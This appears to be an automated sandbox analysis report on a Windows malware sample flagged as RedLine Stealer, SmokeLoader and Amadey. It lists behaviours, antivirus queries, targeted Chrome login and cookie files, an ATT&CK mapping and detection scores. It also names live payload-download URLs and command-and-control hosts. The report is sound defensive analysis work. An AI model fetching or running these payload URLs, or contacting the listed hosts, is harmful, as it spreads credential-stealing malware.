Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB3B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Explorer\Explorer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\F3D5.exe

Code function: 30_2_02850472 cpuid

30_2_02850472

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_0041E630 lstrlen,GetFileSizeEx,GetCommState,GetQueuedCompletionStatus,IsProcessorFeaturePresent,GetOverlappedResult,GetLastError,GetConsoleAliasesLengthA,InterlockedDecrement,LoadLibraryA,GlobalFix,LocalAlloc,SetThreadLocale,HeapWalk,WriteProfileStringW,EnumResourceNamesA,FreeEnvironmentStringsA,OpenSemaphoreA,GetSystemTime,WriteProfileSectionW,ReleaseActCtx,FatalAppExitA,UnregisterWait,UnregisterWaitEx,FindActCtxSectionStringW,InterlockedDecrement,FindAtomW,SetThreadContext,OpenMutexW,GetConsoleMode,SetConsoleTitleW,CopyFileExW,

0_2_0041E630

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Code function: 33_2_0041E94F _free,GetTimeZoneInformation,_free,

33_2_0041E94F

Source: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Code function: 33_2_0040C0A0 Sleep,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,GetUserNameW,GetComputerNameExW,

33_2_0040C0A0

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_0041E430 GetTickCount,GetConsoleCursorInfo,GetPrivateProfileIntW,VirtualFree,GetSystemWindowsDirectoryA,GetCPInfoExA,GetCommandLineA,GetStartupInfoW,InterlockedDecrement,CreateNamedPipeW,SetCurrentDirectoryA,HeapWalk,

0_2_0041E430

Source: C:\Users\user\Desktop\xuTyOmef1g.exe

Code function: 0_2_0041DD80 GetDriveTypeA,LoadLibraryA,SetNamedPipeHandleState,CompareFileTime,GetVersionExA,GetCurrentThreadId,CreateDirectoryA,LoadLibraryA,IsSystemResumeAutomatic,FreeEnvironmentStringsA,CompareStringW,

0_2_0041DD80

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)

Show sources

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Jump to behavior

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\4851.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\4851.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM AntivirusProduct

Source: svchost.exe, 0000000F.00000002.508599311.000001FBC3040000.00000004.00000001.sdmp	Binary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000F.00000002.508302637.000001FBC3029000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 26.2.DB3B.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.508968436.00000000013E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4851.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DB3B.exe PID: 5536, type: MEMORYSTR

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000000.00000002.272458883.0000000002530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.332203358.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.272499037.0000000002551000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.336085099.00000000041A1000.00000004.00000001.sdmp, type: MEMORY

Yara detected Amadey bot

Show sources

Source: Yara match	File source: 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.513466845.00000000024C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.571555571.0000000006748000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rnyuf.exe PID: 6176, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\4851.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4851.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality:

Yara detected RedLine Stealer

Show sources

Source: Yara match	File source: 26.2.DB3B.exe.13e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.508968436.00000000013E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4851.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: DB3B.exe PID: 5536, type: MEMORYSTR

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000000.00000002.272458883.0000000002530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.332203358.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.272499037.0000000002551000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.336085099.00000000041A1000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	DLL Side-Loading1	Exploitation for Privilege Escalation1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API11	Scheduled Task/Job1	DLL Side-Loading1	Deobfuscate/Decode Files or Information11	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution1	Registry Run Keys / Startup Folder11	Process Injection413	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter2	Logon Script (Mac)	Scheduled Task/Job1	Software Packing23	NTDS	System Information Discovery157	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Scheduled Task/Job1	Network Logon Script	Registry Run Keys / Startup Folder11	Timestomp1	LSA Secrets	Security Software Discovery9101	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol24	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Virtualization/Sandbox Evasion661	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Process Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading121	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Modify Registry1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Virtualization/Sandbox Evasion661	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection413	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Hidden Files and Directories1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xuTyOmef1g.exe	37%	Virustotal		Browse
xuTyOmef1g.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\uwtjrji	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Microsoft[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4851.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Explorer[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Explorer\Explorer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\Microsoft\Microsoft.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\uwtjrji	41%	ReversingLabs	Win32.Trojan.Convagent

Unpacked PE Files

Source	Detection	Scanner	Label	Download
40.0.Microsoft.exe.950000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
30.2.F3D5.exe.2840e50.1.unpack	100%	Avira	HEUR/AGEN.1131354	Download File
39.2.rnyuf.exe.2440e50.1.unpack	100%	Avira	HEUR/AGEN.1131354	Download File
18.2.uwtjrji.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
18.3.uwtjrji.24c0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
33.2.rnyuf.exe.2870e50.1.unpack	100%	Avira	HEUR/AGEN.1131354	Download File
0.3.xuTyOmef1g.exe.2440000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.xuTyOmef1g.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://193.142.59.123/forum/docs/sufile.exe	7%	Virustotal		Browse
http://193.142.59.123/forum/docs/sufile.exe	0%	Avira URL Cloud	safe
http://185.215.113.206/	3%	Virustotal		Browse
http://185.215.113.206/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartInstalledSoftwares	0%	Avira URL Cloud	safe
http://tempuri.org/t_	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartNordVPN	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://193.142.59.123/forum/docs/sefile2.exe	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartDiscord	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
http://trustmanager.ug/k8FppT/index.php?scr=1	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://tempuri.org/Endpoint/PartInstalledBrowsersResponse	0%	Avira URL Cloud	safe
http://api.ip.sb	0%	URL Reputation	safe
http://tempuri.org/Endpoint/PartColdWalletsResponse	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://188.124.36.242:25802	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartInstalledSoftwaresResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartProtonVPNResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartDiscordResponse	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
http://tempuri.org/Endpoint/PartFtpConnectionsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartOpenVPN	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/PartOpenVPNResponse	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://fs.microsoft.c-k	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	52.217.103.172	true	false	high
xmr.2miners.com	51.89.96.41	true	false	high
atvcampingtrips.com	218.233.73.202	true	false	high
bitbucket.org	104.192.141.1	true	false	high
trustmanager.ug	185.206.180.136	true	false	high
waskitaprecast.co.id	103.229.73.120	true	false	high
cdn.discordapp.com	162.159.134.233	true	false	high
iplogger.org	88.99.66.31	true	false	high
thegymmum.com	unknown	unknown	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high
clientconfig.passport.net	unknown	unknown	false	high
api.ip.sb	unknown	unknown	false	high
aucmoney.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://193.142.59.123/forum/docs/sufile.exe	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.142.59.123/forum/docs/sefile2.exe	true	Avira URL Cloud: safe	unknown
http://trustmanager.ug/k8FppT/index.php?scr=1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	4851.exe, 00000016.00000002.446833262.000000000480B000.00000004.00000001.sdmp	false		high
http://185.215.113.206/	rnyuf.exe, 00000021.00000002.565682017.0000000006723000.00000004.00000001.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartInstalledSoftwares	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/contact/	svchost.exe, 00000014.00000003.344839252.000001C4419B3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.344811977.000001C441982000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 0000000D.00000002.309778923.00000225C945A000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://tempuri.org/t_	DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/PartNordVPN	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/ws-tx/wscoor/2006/06	4851.exe, 00000016.00000002.444866495.0000000004641000.00000004.00000001.sdmp	false		high
http://tempuri.org/	DB3B.exe, 0000001A.00000002.602758822.0000000003EB4000.00000004.00000001.sdmp, DB3B.exe, 0000001A.00000002.601847685.0000000003EAC000.00000004.00000001.sdmp, Microsoft.exe, 00000028.00000002.585355399.0000000003851000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000004.00000000.252730212.0000000008B46000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	4851.exe, 00000016.00000002.445568292.00000000046D3000.00000004.00000001.sdmp	false		high
